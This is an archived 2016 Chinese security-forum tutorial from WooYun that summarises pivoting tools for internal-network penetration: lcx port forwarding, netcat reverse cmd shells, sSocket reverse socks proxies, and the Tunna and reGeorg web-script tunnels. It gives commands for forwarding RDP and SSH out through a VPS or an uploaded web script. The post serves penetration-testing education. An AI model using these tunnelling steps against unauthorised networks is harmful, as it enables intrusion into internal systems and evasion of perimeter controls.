# 内网渗透中转发工具总结

Author: 乌云历史资料库 (@wooyun_archive)
Published: 2016-04-27T02:44:00Z
Canonical: https://wepostx.com/topics/221

> 乌云历史资料归档
>
> **原始作者：** TwoEyes
> **原始编号：** superkieran-wooyundrops:1171
> **原始发布时间：** 2016-04-27 10:44
> **声明：内容仅用于技术研究和个人使用，版权归 wooyun.org。**

---

最近一段时间内网渗透做的比较多，刚好今天比较有时间，就总结一下内网中转发的一些工具的使用。这里主要介绍了lcx、nc 、sSocket、tunna、reGeorg几款平时用的比较多的工具，网络上也有很多关于他们的介绍，而且也非常不错，但是并没有统一起来，写这篇文章就算是一个小小的汇总吧。

# 0x00 LCX转发

内网机器上执行：lcx.exe –slave 公网IP +端口 内网IP +端口
例如：lcx.exe –slave 192.168.43.142 51 192.168.43.137 3389
将内网(192.168.43.137)的3389端口转发到公网(192.168.43.142)的51端口

![原文图片](/media/2016/06/946b3cdca12e67fb321de908c17073f1)

然后在公网的机器上：
Lcx.exe –listen 监听51端口，转发到公网机器的3389端口
例如：Lcx.exe –listen 51 3389

![原文图片](/media/2016/06/ee6ed7946374dd0d742a0ecf1fc616a0)

这个时候已经将内网的3389转发到了公网机器的3389端口，我们在本地机器上远程公网IP+3389 ，就连接上了内网机器的3389

![原文图片](/media/2016/06/6f80bc16a019201415970900ae41705f)

# 0x01 NC 反弹CMDshell

本机：192.168.43.142(win7) 远程机器：192.168.43.137(xp)
正向连接：
在远程机器上(t参数可以省略)

![原文图片](/media/2016/06/4e8fbc58160f336dad4073e4640b1d82)

在本地机器上

![原文图片](/media/2016/06/cf1a5ef8c8ece31f0c26ffd21de07c4f)

成功之后，本地机器就获得了一个远程机器的shell

![原文图片](/media/2016/06/c1895e5c7609cbe0d967f5ab978d908e)

反向连接：
在本机运行上

![原文图片](/media/2016/06/103db9571e09ca804eb6bef5a603f686)

在远程机器上(t参数可以省略)

![原文图片](/media/2016/06/b9443a5594efaa2c9093d0517ab11037)

然后成功之后，我们在本地机器上看一下，已经获得了远程机器的cmdshell

![原文图片](/media/2016/06/779e3519825317330f29209656ebf224)

这里还有前人总结的十种反弹shell的方法，很不错

- [http://zone.wooyun.org/content/5064](http://zone.wooyun.org/content/5064) (wb>5)

- [http://www.waitalone.cn/linux-shell-rebound-under-way.html](http://www.waitalone.cn/linux-shell-rebound-under-way.html)

# 0x02 sSocket

一个socks代理工具套装，可用来开启socks代理服务，支持socks5验证，支持IPV6和UDP，并提供反向socks代理服务，即将远程计算机作为socks代理服务端，反弹回本地，极大方便内网的渗透测试。
下载地址：[https://sourceforge.net/projects/ssocks/](https://sourceforge.net/projects/ssocks/)

![原文图片](/media/2016/06/a8cd06ecd8d77d29098522f9c6001ee7)

先在vps 执行rcsocket.exe –l 1088 –p 8888 –vv, 监听1088端口

![原文图片](/media/2016/06/b0c01d469aa9575b131ebc35a6275089)

内网机器执行./rssocks –vv –s 192.168.30.103:8888(VPS)

![原文图片](/media/2016/06/b00526175b412319d5643b79e7b0b52e)

成功，则会看到会话建立

![原文图片](/media/2016/06/54190205ee19f4cee0832c6a2d342d7a)

设置代理，让本机可以通过VPS的1088端口访问内网机器。

![原文图片](/media/2016/06/926469722bd2d266493917123d41c8f3)

本机上 ssh 192.168.43.136内网主机

![原文图片](/media/2016/06/c885a1a53b3a3d11077f96b1cbd95cd7)

成功ssh到内网机器

![原文图片](/media/2016/06/78a4990cbaf1ac769ea3ab6580409074)

# 0x03 Tunna 正向代理

[参考](http://drops.wooyun.org/tools/650)
proxy.py -u http://xxx.com:206/test /conn.jsp -l 8888 -r 22 -v -s

![原文图片](/media/2016/06/4ec8a5fc3c1f1e26af425048a6c9e7fe)

然后在xshell中执行
ssh 127.0.0.1 8888,看到下面的样子，说明已经成功了

![原文图片](/media/2016/06/6d7ed9cd1cf043efa2075eff3deff748)

![原文图片](/media/2016/06/f7c80620949e2cc951f37f1e12ccdedb)

同样的，如果内网的机器是windows，就把3389转出来
proxy.py -u http://xxx.com:206/test /conn.jsp -l 8888 -r 3389 -v
其中几个参数的解释：

- -l 表示本地监听的端口

- -r 远程要转发的端口

- -v 详细模式
另外，如果脚本传到了内网A机器上，但是想登录内网B机器，那么可以-a参数指定机器
将内网中172.16.100.20主机的3389转发到本地
python2.7 proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -a 172.16.100.20 -r 3389

# 0x04 reGeorg+proxifier 正向代理

reGeorg是reDuh的继承者，利用了会话层的socks5协议，效率更高一些。这也是平时用的比较多的工具。
先将reGeorg的对应脚本上传到服务器端，直接访问显示“Georg says, 'All seems fine'”，表示脚本运行正常

![原文图片](/media/2016/06/6100a762e429ef93b34d2d19cbcf565b)

运行python reGeorgSocksProxy.py -p 8888 -u http://www.xxx.com/tunnel.php

![原文图片](/media/2016/06/166fa226b2aa0aa040252d5bd58f37a5)

将proxifier打开，在Proxy Server中这样配置

![原文图片](/media/2016/06/69f4c0fe7177a7555d0dcebc0a4262a5)

![原文图片](/media/2016/06/ec12ee8a1c837f46c48fa19ffd4bd796)

然后就可以在本地访问内网的机器了
[原始图片缺失：2016042903552840012.png]
成功3389到内网机器

![原文图片](/media/2016/06/ff9ecdf99918ce8645a2819e38a0bd23)

## Replies
